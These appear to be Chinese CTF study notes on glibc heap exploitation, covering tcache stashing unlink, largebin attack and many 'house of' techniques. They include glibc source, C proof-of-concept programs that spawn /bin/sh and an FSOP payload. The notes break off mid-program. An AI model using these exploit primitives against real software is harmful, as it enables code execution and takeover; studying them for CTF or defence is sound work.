0x61107b3f77c0 0x0 0x460 Freed 0x0 0x0
Corrupt ?! (size == 0) (0x61107b3f7c20)
pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0xa51 /* 'Q\n' */
02:0010│ 0x61107b3f7c10 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> bins
tcachebins
empty
fastbins
empty
unsortedbin
all: 0x61107b3f7c00 —▸ 0x73ccc601ace0 (main_arena+96) ◂— 0x61107b3f7c00
smallbins
empty
largebins
empty

unsortedbin attack

unsortedbin leak libc还是比较常见的,unsortedbin attack感觉几乎没有了

decrypt_safe_linking

free函数为例子,在2.32-glibc中在释放chunk时(fastbintcache都加上了)不是直接把fd值放入p->fd中。而是经过PROTECT_PTRREVEAL_PTR处理。PROTECT_PTR和 REVEAL_PTR在宏定义中定义:

/* Safe-Linking:  
Use randomness from ASLR (mmap_base) to protect single-linked lists
of Fast-Bins and TCache. That is, mask the "next" pointers of the
lists' chunks, and also perform allocation alignment checks on them.
This mechanism reduces the risk of pointer hijacking, as was done with
Safe-Unlinking in the double-linked lists of Small-Bins.
It assumes a minimum page size of 4096 bytes (12 bits). Systems with
larger pages provide less entropy, although the pointer mangling
still works. */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

漏洞产生于_int_malloc

if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;

if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put (tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

前面的部分确实没有问题,进行了双向链表检查

if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;

但是将smallbin链入tcache中却没有进行双向链表检查

if (tc_victim != 0)
{
bck = tc_victim->bk;
// if (__glibc_unlikely (bck->fd != tc_victim))
// malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put (tc_victim, tc_idx);
}

也就是说,只要绕过取出的第一个chunk的双向指针检查,并且修改bk指针即可实现tcache的异常情况

高版本unsortedbin attack

写入的是链入tcachesmallbin对应的main_arena -> bins的地址

举个例子

pwndbg> tele 0x7fffffffda58
00:0000│-018 0x7fffffffda58 —▸ 0x55555555a470 ◂— 0
01:0008│-010 0x7fffffffda60 —▸ 0x55555555a450 ◂— 0
02:0010│-008 0x7fffffffda68 —▸ 0x7ffff7fb4e00 (main_arena+352) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) ◂— ...
03:0018│ rbp 0x7fffffffda70 ◂— 1


pwndbg> tele 0x7ffff7fb4e00
00:0000│ 0x7ffff7fb4e00 (main_arena+352) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) —▸ 0x7ffff7fb4dc0 (main_arena+288) ◂— ...
01:0008│ 0x7ffff7fb4e08 (main_arena+360) —▸ 0x7ffff7fb4df0 (main_arena+336) —▸ 0x7ffff7fb4de0 (main_arena+320) —▸ 0x7ffff7fb4dd0 (main_arena+304) —▸ 0x7ffff7fb4dc0 (main_arena+288) ◂— ...
02:0010│ 0x7ffff7fb4e10 (main_arena+368) —▸ 0x55555555a330 ◂— 0
03:0018│ 0x7ffff7fb4e18 (main_arena+376) —▸ 0x7fffffffda58 —▸ 0x55555555a470 ◂— 0

0x7fffffffda58 -> fd的位置写上了0x7ffff7fb4e00 (main_arena+352),其中0x7ffff7fb4e10 (main_arena+368)记录的是我所链入的smallbin 0x110链条的fd0x7ffff7fb4e18 (main_arena+376)则是记录bk,写上的是smallbin 0x100链条的fd所处的地址

不是一定使用calloc,使用calloc只是因为calloc不会优先使用tcache,优先取的是smallbins中的堆块,使得可以少量的smallbinstcache的操作即可完成,如果没有calloc也是可以完成的,只不过需要先填充满tcache然后释放多个堆块进入unsortedbin,在取完tcache后再取一个smallbin,操作次数更多罢了

下面是glibc-2.39callocmalloc的对比

// calloc
void *
__libc_calloc (size_t n, size_t elem_size)
{
mstate av;
mchunkptr oldtop;
INTERNAL_SIZE_T sz, oldtopsize;
void *mem;
unsigned long clearsize;
unsigned long nclears;
INTERNAL_SIZE_T *d;
ptrdiff_t bytes;

if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
{
__set_errno (ENOMEM);
return NULL;
}

sz = bytes;

if (!__malloc_initialized)
ptmalloc_init ();

MAYBE_INIT_TCACHE ();

if (SINGLE_THREAD_P)
av = &main_arena;
else
arena_get (av, sz);

if (av)
{
/* Check if we hand out the top chunk, in which case there may be no
need to clear. */
#if MORECORE_CLEARS
oldtop = top (av);
oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
/* Only newly allocated memory is guaranteed to be cleared. */
if (av == &main_arena &&
oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
if (av != &main_arena)
{
heap_info *heap = heap_for_ptr (oldtop);
if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
}
#endif
}
else
{
/* No usable arenas. */
oldtop = 0;
oldtopsize = 0;
}
mem = _int_malloc (av, sz);
...

可以看见没有从tcache中取得堆块

malloc

void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;

_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
"PTRDIFF_MAX is not more than half of SIZE_MAX");

if (!__malloc_initialized)
ptmalloc_init ();
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes = checked_request2size (bytes);
if (tbytes == 0)
{
__set_errno (ENOMEM);
return NULL;
}
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
&& tcache != NULL
&& tcache->counts[tc_idx] > 0)
{
victim = tcache_get (tc_idx);
return tag_new_usable (victim);
}
DIAG_POP_NEEDS_COMMENT;
#endif

if (SINGLE_THREAD_P)
{
victim = tag_new_usable (_int_malloc (&main_arena, bytes));
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
&main_arena == arena_for_chunk (mem2chunk (victim)));
return victim;
}

arena_get (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
...

中有tcache取得堆块的代码

当然,不一定需要多个unsortedbin进入smallbin,如果能得到libc基址和heap基址,也可以释放一个堆块进入smallbin,然后在这个smallbin中伪造出多个smallbin,这样做还会有一个好处,那就是会释放进入tcache后可以修改多个fd造成任意地址分配

在已经进入smallbin的堆块中伪造多个堆块的设置是

chunk1 | chunk2 | ... | chunk(n-1) | chunkn (假设chunk1已经在smallbin的0xk0大小的链上)
prev_size全设为0
size全设置为相同,为0xk1
fd chunkn指向chunk(n-1),chunk(n-1)指向chunk(n-2),...,chunk2指向chunk1,chunk1指向chunk1
bk chunk1指向chunk2,chunk2指向chunk3,chunk(n-1)指向chunkn,chunkn指向对应的main_arena->bins(就是原本没被破坏时bk的值)

这样我们可以轻松地控制tcache的分配

smallbins
0x110 [corrupted]
FD: 0x555555559ae0 ◂— 0x555555559ae0
BK: 0x555555559ae0 —▸ 0x555555559b00 —▸ 0x555555559b20 —▸ 0x555555559b40 —▸ 0x555555559b60 ◂— ...

->

tcachebins
0x110 [ 6]: 0x555555559bb0 —▸ 0x555555559b90 —▸ 0x555555559b70 —▸ 0x555555559b50 —▸ 0x555555559b30 —▸ 0x555555559b10 ◂— 0

此时0x555555559ae0这个堆块已经被我们取出,可以轻松修改0x555555559bb0处的fd指针造成任意地址分配(house of minhu

#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
for(int i=0; i<8; i++){
arr[i] = (long long*) malloc(0x100);
long long *p = (long long*) malloc(0x10);
}
for(int i=0; i<8; i++){
free(arr[i]);
}
long long *p = (long long*) malloc(0x110);
long long arena_bk = arr[7][1];
arr[7][0]=(long long)arr[7]-0x10;
arr[7][1]=(long long)arr[7]+0x10;
arr[7][2]=0;
arr[7][3]=0x110;
arr[7][4]=(long long)arr[7]-0x10;
arr[7][5]=(long long)arr[7]+0x30;
arr[7][6]=0;
arr[7][7]=0x110;
arr[7][8]=(long long)arr[7]+0x10;
arr[7][9]=(long long)arr[7]+0x50;
arr[7][10]=0;
arr[7][11]=0x110;
arr[7][12]=(long long)arr[7]+0x30;
arr[7][13]=(long long)arr[7]+0x70;
arr[7][14]=0;
arr[7][15]=0x110;
arr[7][16]=(long long)arr[7]+0x50;
arr[7][17]=(long long)arr[7]+0x90;
arr[7][18]=0;
arr[7][19]=0x110;
arr[7][20]=(long long)arr[7]+0x70;
arr[7][21]=(long long)arr[7]+0xb0;
arr[7][22]=0;
arr[7][23]=0x110;
arr[7][24]=(long long)arr[7]+0x90;
arr[7][25]=arena_bk;
for(int i=0; i<8; i++){
arr[i] = (long long*) malloc(0x100);
}
return 0;
}
  • 任意地址写libc地址
    • 先进行堆地址的泄露
    • 然后将tcachebin中只留6个堆块,这样smallbin链入tcachebin后,tcachebin就会直接装满,防止程序继续通过我们篡改的bk指针继续往下遍历
    • 再做出至少两个位于smallbin中的chunk(可以通过切割unsorted bin的方式,让剩余部分的堆块进入small bin或者当遍历unsorted bin的时候,会给堆块分类,让其小堆块进入small bin中)
    • 利用溢出或UAF+edit等手段,篡改位于smallbin中的链表头堆块的bk指针为target_addr-0x10
    • 注意伪造bk的时候一定不能破坏fd指针
    • 最后我们申请一个位于smallbin那条链对应size中的chunk,将smallbin中的链表尾堆块申请出来,而smallbin链中的链表头堆块则进入tcachebin,在链入tcachebin的期间触发了tcache stashing unlink attack
#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
for(int i=0; i<9; i++){
arr[i] = (long long*) malloc(0x100);
long long *p = (long long*) malloc(0x10);
}
for(int i=0; i<9; i++){
free(arr[i]);
}
long long target = 0;
long long *p = (long long*) malloc(0x110);

arr[8][1]=(long long)&target-0x10;
arr[0] = (long long*) malloc(0x100);
arr[7] = (long long*) calloc(1,0x100);
if(target > 0x700000000000){
puts("[+] success");
printf("target: 0x%llx\n", target);
system("/bin/sh");
}
return 0;
}
  • 任意地址分配
    • 先进行堆地址的泄露
    • 然后将tcachebin中只留5个堆块
    • 再做出两个位于smallbin中的chunk
    • 利用溢出或UAF+edit等手段,篡改位于smallbin中的链表头堆块的bk指针为我们想要申请的地址附近fake_chunk_addr-0x10,再修改fake_chunk_bk=target_addr-0x10
    • 注意伪造bk的时候一定不能破坏fd指针
    • 最后我们申请一个位于smallbin那条链对应size中的chunk,在链入tcachebin的期间触发了tcache stashing unlink attack,得到了一个堆块的分配和一个任意地址写libc

注意在calloc

smallbins
0x...0 [corrupted]
FD: chunk1 —▸ chunk2 —▸ main_arena+xxx ◂— chunk1
BK: chunk2 —▸ chunk1 —▸ target_addr —▸ writable_addr ◂— xxx

注意申请的地方的bk位置要可写,并且calloc后这个writable->fd会被写入main_arena+xxx

#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
for(int i=0; i<9; i++){
arr[i] = (long long*) malloc(0x200);
long long *p = (long long*) malloc(0x10);
}
for(int i=0; i<9; i++){
free(arr[i]);
}
long long target = 0;
long long *p = (long long*) malloc(0x210);
long long libc=arr[7][0]+0x810;
arr[8][1]=libc;
arr[0] = (long long*) malloc(0x200);
arr[1] = (long long*) malloc(0x200);
arr[7] = (long long*) calloc(1,0x200);
arr[7] = (long long*) malloc(0x200);

arr[7][0x10]=(long long)0x3b687320; // " sh;"
arr[7][0x10+5]=libc-0x1728dc; // system
arr[7][0x10+17]=(long long)arr[0]+0x20; // prot:w
arr[7][0x10+1]=(long long)arr[7]+0x70;
arr[7][0x10+20]=(long long)arr[7]+0x40;
arr[7][0x10+27]=libc-0x22c8-0x20; // _IO_wfile_jumps
puts("failed");
return 0;
}

largebin attack

不同的size处在不同的largebin链上

size index
[0x400 , 0x440) 64
[0x440 , 0x480) 65
[0x480 , 0x4C0) 66
[0x4C0 , 0x500) 67
[0x500 , 0x540) 68
0x40等差
[0xC00 , 0xC40) 96
[0xC40 , 0xE00) 97
[0xE00 , 0x1000) 98
[0x1000 , 0x1200) 99
[0x1200 , 0x1400) 100
[0x1400 , 0x1600) 101
0x200等差
[0x2800 , 0x2A00) 111
[0x2A00 , 0x3000) 112
[0x3000 , 0x4000) 113
[0x4000 , 0x5000) 114
0x1000等差
[0x9000 , 0xA000) 119
[0xA000 , 0x10000) 120
[0x10000 , 0x18000) 121
[0x18000 , 0x20000) 122
[0x20000 , 0x28000) 123
[0x28000 , 0x40000) 124
[0x40000 , 0x80000) 125
[0x80000 , … ) 126

2.31+

2.39的glibc是从unsortedbin中放入largebin时的代码是

/* place chunk in bin */

if (in_smallbin_range (size))
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert (chunk_main_arena (bck->bk));
if ((unsigned long) (size)
< (unsigned long) chunksize_nomask (bck->bk))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert (chunk_main_arena (fwd));
while ((unsigned long) size < chunksize_nomask (fwd))
{
fwd = fwd->fd_nextsize;
assert (chunk_main_arena (fwd));
}

if ((unsigned long) size
== (unsigned long) chunksize_nomask (fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}

漏洞产生于

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

这里没有任何的检测就可以执行

victim->bk_nextsize = fwd->fd->bk_nextsize;
victim->bk_nextsize->fd_nextsize = victim;

也就是说,这要能修改最大chunkbk_nextsize为地址A,就能在A->fd_nextsize上写一个堆地址

很简单的利用

size_t *p1 = malloc(0x428);
size_t *g1 = malloc(0x18);
size_t *p2 = malloc(0x418);
size_t *g2 = malloc(0x18);

free(p1);
size_t *g3 = malloc(0x438);
free(p2);
p1[3] = (size_t)((&target)-4);
size_t *g4 = malloc(0x438);

assert((size_t)(p2-2) == target);

tcache poisoning

高版本的fastbin,相比与其他bins的检查更少,更容易利用的方式

修改放入tcachebinattack chunkfd指针指向想要控制的地址,申请与attack chunk大小相同的chunk即可申请到想要的地址 高版本2.32+使用了异或加密,所以我们写入的也要加密

heap overlap

仁者见仁,智者见智

house of spirit

  • 版本:2.23~
  • 目的:获得某块内存的任意写
  • 利用方式:在某块内存伪造chunk,将本来不是chunk的这块内存被freebins里,再次malloc后就实现了任意写
  • 伪造结构:
    • fake_chunk
      • prev_size无要求
      • size
        • N->0
        • M->0
        • P->0
        • prev_size的最低位地址满足16字节对齐(64位)
        • size<0x80
        • size满足16字节对齐(64位)
      • fd、bk、data无要求
    • next_chunk
      • prev_size无要求
      • size<128KB
      • size满足16字节对齐(64位)
  • 利用前提
    • 能通过溢出控制要free的地址
  • 注意事项
    • 注意题目中的计数器
    • 如果有多个地方可以伪造,注意伪造到哪个地方对后续有用。
    • 注意伪造堆块的size位和next_size位。
    • 还要注意程序逻辑,如果当程序释放完fake_chunk后还要再继续释放,可能就会出现问题,这时就要在fake_chunk中写入适当的数据,绕过程序逻辑

house of Einherjar

  • 版本:2.23~
  • 目的:获得某块内存的任意写
  • 利用方式:在某块内存伪造chunk,利用off-by-one使堆块后向合并,将指针更新为指向fake chunk,再次malloc后就实现了在fake chunk任意写
  • 伪造结构:
    • fake_chunk
      • prev_size = chunk1_size
      • size
        • N->0
        • M->0
        • P->0
        • prev_size的最低位地址满足16字节对齐(64位)
        • size = chunk1_size
      • fd、bk、fd_nextsize、bk_nextsize = fake_chunk_prev_size_addr
    • chunk0
    • chunk1
      • prev_size = chunk1_addr-fake_chunk_addr
      • N->0
      • M->0
      • P->0
      • size0x100整数倍(size=0也被允许)
  • 利用前提
    • off-by-one、off-by-null
    • 能获得堆地址和fake chunk地址

house of force

  • 版本:2.23~2.29
  • 目的:获得某块内存的任意写
  • 利用方式:修改top chunksize极大,申请一个可能极大的堆(从堆地址一直到要修改的地址),将top chunk指针更新为指向target,再次malloc后就实现了在target任意写
  • 攻击方式:
    • 通过溢出修改top chunksize位为-1
    • 申请一个特定大小的堆(可以是负数)
      • req=dest - old_top_prev_size_addr - 4*sizeof(long)
    • 再次申请即可实现某块特定内存的任意写
  • 利用前提
    • 堆溢出修改top chunksize
    • 能获得堆地址和目的地址

house of lore

  • 版本:2.23~2.31

  • 目的:获得某块内存的任意写

  • 利用方式:在某块内存伪造chunk和辅助chunk,利用UAF修改smallbinbk指针,使fake_chunk链入smallbinmalloc smallbin后再次malloc后就实现了在fake chunk任意写

  • 伪造结构:

    • fake_chunk_1
      • fd = small_chunk_1_prev_size_addr
      • bk = fake_chunk_2_prev_size_addr
    • fake_chunk2
      • fd = fake_chunk_1_prev_size_addr
  • 具体实现:

    • 申请一个smallbin范围堆块(victim),伪造fake_chunk_1fake_chunk_2
    • 释放victim,申请一个更大的堆块,再修改victim->bkfake_chunk_1_prev_size_addr
    • 再申请一个与victim同样大小的堆,将fake_chunk链入smallbin,触发(smallbin->bk = victim->bk=stack_buffer1_addr)
    • 再申请一个与victim同样大小的堆,即可得到fake_chunk_1
  • 利用前提

    • UAF
    • 能获得堆地址甚至需要其他地址
  • Step 1

  • Step 2

  • Step 3

  • Step 4

house of orange

  • 版本:2.23~2.26
  • 效果:任意函数/命令执行
  • 特点:无free
  • 利用过程:
    • 先利用溢出等方式进行篡改top chunksize
    • 然后申请一个大于top chunksize
    • 实现了将堆块放入unsortedbin
  • 伪造结构:
    • nb表示申请堆块大小
    • MINSIZE<old_top_size<nb+MINSIZE
    • old_top_sizeprev_size位是1
    • (old_top_size+old_top)&0xfff=0x000
    • nb<0x20000
  • unsortedbin attack
    • 往一个指定地址里写入一个很大的数(main_arena+88或main_arena+96)
    • 实现:
      • unsortedbin的尾部chunkbk指针写入target_addr-0x10
    • 完成了unsortedbin attack后将无法从unsortedbin中获得堆块了
  • FSOP
    • 原理:
      • 篡改_IO_list_all_chain,来劫持IO_FILE结构体,让IO_FILE结构体落在我们可控的内存上,然后在FSOP中我们使用_IO_flush_all_lockp来刷新_IO_list_all链表上的所有文件流,也就是对每个流都执行一下fflush,而fflush最终调用了vtable中的_IO_overflow
      • 而前面提到了,我们将IO_FILE结构体落在我们可控的内存上,这就意味着我们是可以控制vtable的,我们将vtable中的_IO_overflow函数地址改成system地址即可,而这个函数的第一个参数就是IO_FILE结构体的地址,因此我们让IO_FILE结构体中的flags成员为/bin/sh字符串,那么当执行exit函数或者libc执行abort流程时或者程序从main函数返回时触发了_IO_flush_all_lockp即可拿到shell
    • 布局
      • 篡改_IO_list_allmain_arena+88这个地址,chain字段是首地址加上0x68偏移得到的,因此chain字段决定了下一个IO_FILE结构体的地址为main_arena+88+0x68,这个地址恰好是smallbinsize0x60的数组
      • 将一个chunk放到这个smallbinsize0x60的链上,那么篡改_IO_list_allmain_arena+88这个地址后,smallbin中的chunk就是IO_FILE结构体了,
      • 将其申请出来后可以控制这块内存从而伪造vtable字段进行布局最终拿到shell
    • 检查绕过
      • mode=0
      • _IO_write_ptr=1
      • _IO_write_base=0
      • _flag=/bin/sh
    • 成功概率只有50%
    • glibc-2.24后加入vtablecheck,但可以利用IO_str_jumps结构利用
    • unsortedbin attackFSOP攻击都是构造数据在一个payload里的
payload=b'f'*0x400
payload+=p64(0)+p64(0x21)
payload+=p64(sys_addr)+p64(0)
payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size 同时也是fake file的_flags字段
payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk
payload+=p64(0)+p64(1)#_IO_write_base & _IO_write_ptr
payload+=p64(0)*7
payload+=p64(leak_heap+0x430)#chain->old top chunk addr
payload+=p64(0)*13
payload+=p64(leak_heap+0x508)#vtable
payload+=p64(0)+p64(0)+p64(sys_addr)#DUMMY finish overflow

     if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;

house of rabbit

  • 版本:2.23~2.31
  • 目的:获得某块内存的任意写
  • 核心:利用 fastbin consolidate 使 fastbin 中的 fake chunk 合法化
  • 利用方式:
    • 修改fd
      • 申请 chunk A (fastbin)chunk B (smallbin)
      • 释放 chunk A,修改 A->fd 指向地址 X
      • free chunk B使fake chunk 被放到了 unsortedbin
      • 分配足够大的 chunk等能触发 malloc_consolidate 使fake chunk 进入到对应的 smallbin/largebin
      • 取出 fake chunk 进行读写即可
    • 堆叠
  • 利用前提
    • UAF
    • fastbinfdsize域可写
    • 超过0x400大小的堆分配

house of roman

  • 版本:2.23~2.29
  • 目的:getshell
  • 利用方式:
    • Step 1
      • 构造chunk
        • chunk_0size=0x70
          • fastbin_victim
          • UAF
        • chunk_1size=0x90
          • 使chunk_2页对齐
        • chunk_2size=0x90
          • main_arena_use
          • unsortedbin
        • chunk_3size=0x70
          • relative_offset_heap
          • 写相对地址
      • free(chunk_2)
      • malloc(0x60)
        • chunk_2->chunk_2_1(0x70,fake_libc_chunk)+chunk_2_2(0x20,leftover_main,unsortedbin)
      • free(chunk_3)+free(chunk_0),都在fastbin
      • edit(chunk_0->fd=fake_libc_chunk_prev_size_addr)
      • edit(fake_libc_chunk->fd=__malloc_hook-0x23)
        • 爆破
      • malloc(0x60)*3
    • Step 2
      • malloc(chunk_4,size=0x90)+malloc(0x30)
      • free(chunk_4)
      • edit(chunk_4->bk=__malloc_hook-0x10)
      • malloc(malloc_hook_chunk,size=0x90)
      • edit(malloc_hook_chunk->fd=ogg_addr)
  • 利用前提
    • UAF
    • 不需要泄露地址
    • 爆破16位,1/40960

house of storm

  • 版本:2.23~2.29
  • 目的:任意地址写
  • 伪造结构
    • unsorted_bin->fd = 0
    • unsorted_bin->bk = fake_chunk
    • large_bin->fd = 0
    • large_bin->bk = fake_chunk+8
    • large_bin->fd_nextsize = 0
    • large_bin->bk_nextsize = fake_chunk - 0x18 -5
  • 利用方式:
    • chunk_1size=0x410
    • chunk_2size=0x30
    • chunk_3size=0x420
    • chunk_4size=0x30
    • chunk_5size=0x30
    • chunk_6size=0x30
    • free(chunk_1)+free(chunk_3)+free(chunk_5)
    • malloc(chunk_5)
    • malloc(chunk_3)+free(chunk_3)
    • edit(chunk_3->bk=__malloc_hook-0x50)
    • edit(chunk_1->bk=__malloc_hook-0x50+8)
    • edit(chunk_1->bk_nextsize=__malloc_hook-0x50-0x18-5)
    • malloc(0x48)(__malloc_hook_chunk)
    • edit(__malloc_hook_chunk+0x40=ogg_addr)
    • malloc->getshell
  • 利用前提
    • UAF
    • unsortedbin attacklargebin attack

house of corrosion

  • 版本:2.23~
  • 目的:任意地址读写,任意地址值转移
  • 伪造结构
    • chunk size = (target_addr - &main_arena.fastbinsY) x 2 + 0x20
  • 利用方式:
    • target_addrtarget_message
      • 释放fastbin Atarget_addr使A->fd指向target_message
    • target_messagetarget_addr
      • malloc(A,size=chunk size)
      • unsortedbin attack change global_max_fast
      • free(A)
      • 使A->fdtarget_message
      • malloc(A)
    • 转移attack_addrtarget_messagetarget_addr地址上
      • src_size=(attack_addr-fastbinY)*2+0x20
      • dst_size=(target_addr-fastbinY)*2+0x20
      • malloc(A,size=dst_size)
      • malloc(B,size=dst_size)
      • free(B)
      • free(A)
      • unsortedbin attack change global_max_fast
      • 使attack_addrfd指向的堆A的fd指向自己
      • malloc(A)edit(A->size=src_size)free(A)
      • 此时A落入target_addrfd指针值变成target_message
      • edit(A->size=dst_size),落入target_messagemalloc(A)
  • 利用前提
    • UAF、堆溢出
    • 不需要泄露地址,爆破1/16
    • 任意大小分配
    • 可以修改global_max_fast

house of husk

  • 版本:2.23~2.35
  • 目的:backdoor or getshell
  • 伪造结构
    • __printf_function_table!=NULL
    • __printf_arginfo_table=control_addr
    • __printf_arginfo_table[spec]=backdoor_addr
  • 执行顺序:
    • printf->vprintf->(if __printf_function_table!=NULL)printf_positional->__parse_one_specmb->(*__printf_arginfo_table[spec->info.spec])
  • 利用方式:
    • unsortedbin leak libcunsortedbin attack global_max_fast
  • 利用前提
    • UAF、堆溢出
    • 任意大小分配
    • 可以修改global_max_fast
  • printf:
    • __vfprintf_internal
      • buffered_vfprintf
    • printf_positional
      • __parse_one_specmb
        • (*__printf_arginfo_table[spec->info.spec])

house of mind

house of muney

house of rusk

house of crust

house of io

house of botcake

通过第一次freeunsorted bin,第二次freetcache bin构造chunk overlap,实现tcache中的double free,从而轻易实现tcache poisoning以进行后续攻击

以适当的大小(大于最大fastbin,小于等于最大Tcache)先malloc 7chunk用于填充tcache,再分别malloc一个合并堆块prev,一个与前面7个相同大小的被攻击堆块victim,然后malloc一个任意大小chunk用于和top chunk分隔

void* chunks[7];  
for(int i=0; i<7; i++){
chunks[i]=malloc(0x80);
}
void* prev=malloc(0x80);
void* victim=malloc(0x80);
malloc(0x10);

free掉前7个chunk,填满tcache;然后按顺序freevictimprev,触发prevvictim的合并

for(int i=0; i<7; i++){  
free(chunks[i]);
}
free(victim);
free(prev);

malloc一个相同大小的chunk,使Tcache bin腾出一个位置

malloc(0x80);

再次free victim,此时victim进入Tcache,实现double free

free(victim);

malloc一个合适大小(大于max(prev,victim),小于等于prev+victimchunk),再malloc一个与victim相同大小的chunk,此时这两个chunk间存在重叠。

char* a=malloc(0x100);  
char* b=malloc(0x80);
assert(a+0x100>b);

house of water

  • 在没有show的情况下可以利用UAF(EAF)并且可以申请超大堆块

how2heap演示

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
void *_ = NULL;
setbuf(stdin,NULL);
setbuf(stdout,NULL);
setbuf(stderr,NULL);

//step1:添加堆块0x3e8,0xf8之后依次释放,在tcache_perthread_struct上面伪造一个size 0x10001(在0x88偏移处)
void *fake_size_lsb = malloc(0x3d8);
void *fake_size_msb = malloc(0x3e8);
free(fake_size_lsb);
free(fake_size_msb);

void *metadata = (void *)((long) (fake_size_lsb & -(0xfff)));

//填满0x90的tcache链,这样再申请最终大小为0x90堆块并释放后就会进入unsortedbin
void *x[7];
for(int i = 0 ; i < 7 ; i ++){
x[i] = malloc(0x88);
}

